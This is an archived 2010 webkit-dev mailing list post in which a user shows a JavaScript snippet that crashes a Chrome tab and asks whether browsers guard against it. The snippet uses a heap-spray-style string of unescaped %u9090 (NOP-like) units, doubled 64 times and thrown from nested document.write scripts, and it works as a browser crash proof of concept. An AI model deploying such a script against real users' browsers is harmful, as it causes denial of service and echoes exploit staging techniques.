[webkit-dev] Regarding malicious javascript detection

Nilesh Patil vniles at gmail.com
Sat Apr 17 02:49:16 PDT 2010


Hi

I have a doubt about JavaScript that does malicious things. Consider the
following JavaScript.

<script language="JavaScript">
    // a single UTF-16 code unit (U+9090)
    var n=unescape("%u9090");
    // a long run of NUL code units
    var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000");
    for(var i=0;i<64;i++){
        // doubles the string on every pass, so its length grows as 2^i
        n=n+n;
        // writes a nested script that throws the (huge) string as an exception
        document.write('<script>throw n+s;</scr'+'ipt>');
    }
</script>

The above code causes an exception and thereby causes a crash, though Chrome
doesn't close. I am not sure what this script does, but I think this is
something to do with 'throw' in JavaScript.
Maybe something to do with overflow.
My doubt is,

Is there any kind of handling done for the above scenario, which is a
potential for hacking?

I have Chrome 4.1.249.1045 (42898), on which the above script crashes a Chrome
page.